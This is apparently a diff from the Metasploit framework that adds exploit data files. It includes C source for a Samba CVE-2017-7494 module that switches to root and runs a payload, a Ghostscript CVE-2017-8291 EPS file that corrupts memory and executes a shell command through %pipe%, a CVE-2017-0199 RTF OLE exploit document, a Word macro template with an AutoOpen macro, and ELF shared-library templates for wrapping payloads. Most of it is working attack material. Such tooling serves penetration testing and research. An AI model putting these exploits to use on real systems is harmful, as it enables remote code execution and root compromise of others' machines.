__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
#define PAYLOAD_SIZE 10000
unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
extern bool change_to_root_user(void);
// Samba 4 looks for samba_init_module
int samba_init_module(void)
{
void *mem;
void (*fn)();
change_to_root_user();
mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if (mem == MAP_FAILED)
return 0;
memcpy(mem, payload, PAYLOAD_SIZE);
fn = (void(*)())mem;
if (! fork()) {
fn();
kill(getpid(), 9);
}
return 0;
}
// Samba 3 looks for init_samba_module
int init_samba_module(void) { return samba_init_module(); }

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-aarch64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-armel.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-armhf.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-mips.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-mips64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-mips64el.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-mipsel.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-powerpc.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-powerpc64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-powerpc64le.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-s390x.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-sparc.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-sparc64.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-x86.so.gz Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2017-7494/samba-root-system-linux-glibc-x86_64.so.gz Executable file
View File

Binary file not shown.

34
data/exploits/CVE-2017-7494/samba-root-system.c Normal file
View File

@ -0,0 +1,34 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
#define PAYLOAD_SIZE 10000
unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
extern bool change_to_root_user(void);
// Samba 4 looks for samba_init_module
int samba_init_module(void)
{
change_to_root_user();
if (! fork()) {
system((const char*)payload);
}
return 0;
}
// Samba 3 looks for init_samba_module
int init_samba_module(void) { return samba_init_module(); }

101
data/exploits/CVE-2017-8291/msf.eps Normal file
View File

@ -0,0 +1,101 @@
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

33
data/exploits/cve-2017-0199.rtf Normal file
View File

@ -0,0 +1,33 @@
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author Microsoft}
{\operator Microsoft}
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
MINISTREAM_DATA
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}

2
data/exploits/office_word_macro/[Content_Types].xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

2
data/exploits/office_word_macro/_rels/__rels
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

13
data/exploits/office_word_macro/core.xml Normal file
View File

@ -0,0 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description></dc:description>
<cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
<cp:category/>
</cp:coreProperties>

2
data/exploits/office_word_macro/docProps/app.xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>

2
data/exploits/office_word_macro/docProps/core.xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description> PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>

BIN
data/exploits/office_word_macro/template.docx Normal file
View File

Binary file not shown.

2
data/exploits/office_word_macro/word/vbaData.xml → data/exploits/office_word_macro/vbaData.xml
View File

@ -1,2 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

BIN
data/exploits/office_word_macro/vbaProject.bin Normal file
View File

Binary file not shown.

0
data/exploits/office_word_macro/word/_rels/vbaProject.bin.rels → data/exploits/office_word_macro/vbaProject.bin.rels
View File

2
data/exploits/office_word_macro/word/_rels/document.xml.rels
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>

2
data/exploits/office_word_macro/word/document.xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

2
data/exploits/office_word_macro/word/fontTable.xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

2
data/exploits/office_word_macro/word/settings.xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>

2
data/exploits/office_word_macro/word/styles.xml
View File

File diff suppressed because one or more lines are too long

2
data/exploits/office_word_macro/word/theme/theme1.xml
View File

File diff suppressed because one or more lines are too long

BIN
data/exploits/office_word_macro/word/vbaProject.bin
View File

Binary file not shown.

2
data/exploits/office_word_macro/word/webSettings.xml
View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>

2
data/markdown_doc/auxiliary_scanner_template.erb
View File

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
Other examples of setting the RHSOTS option:
Other examples of setting the RHOSTS option:
Example 1:

92
data/templates/src/elf/dll/elf_dll_armle_template.s Normal file
View File

@ -0,0 +1,92 @@
; build with:
; nasm elf_dll_armle_template.s -f bin -o template_armle_linux_dll.bin
BITS 32
org 0
ehdr:
db 0x7f, "ELF", 1, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 40 ; e_machine = EM_ARMLE
dd 1 ; e_version = EV_CURRENT
dd _start ; e_entry = _start
dd phdr - $$ ; e_phoff
dd shdr - $$ ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr:
dd 1 ; p_type = PT_LOAD
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd 0xDEADBEEF ; p_filesz
dd 0xDEADBEEF ; p_memsz
dd 7 ; p_flags = rwx
dd 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dd dynsection ; p_offset
dd dynsection ; p_vaddr
dd dynsection ; p_vaddr
dd dynsz ; p_filesz
dd dynsz ; p_memsz
dd 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dd 0 ; sh_flags
dd dynsection ; sh_addr
dd dynsection ; sh_offset
dd dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dd 8 ; sh_addralign
dd 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dd 0 ; sh_flags
dd strtab ; sh_addr
dd strtab ; sh_offset
dd strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dd 0 ; sh_addralign
dd 0 ; sh_entsize
dynsection:
; DT_INIT
dd 0x0c
dd _start
; DT_STRTAB
dd 0x05
dd strtab
; DT_SYMTAB
dd 0x06
dd strtab
; DT_STRSZ
dd 0x0a
dd 0
; DT_SYMENT
dd 0x0b
dd 0
; DT_NULL
dd 0x00
dd 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:

92
data/templates/src/elf/dll/elf_dll_x86_template.s Normal file
View File

@ -0,0 +1,92 @@
; build with:
; nasm elf_dll_x86_template.s -f bin -o template_x86_linux_dll.bin
BITS 32
org 0
ehdr:
db 0x7f, "ELF", 1, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 3 ; e_machine = EM_386
dd 1 ; e_version = EV_CURRENT
dd _start ; e_entry = _start
dd phdr - $$ ; e_phoff
dd shdr - $$ ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr:
dd 1 ; p_type = PT_LOAD
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
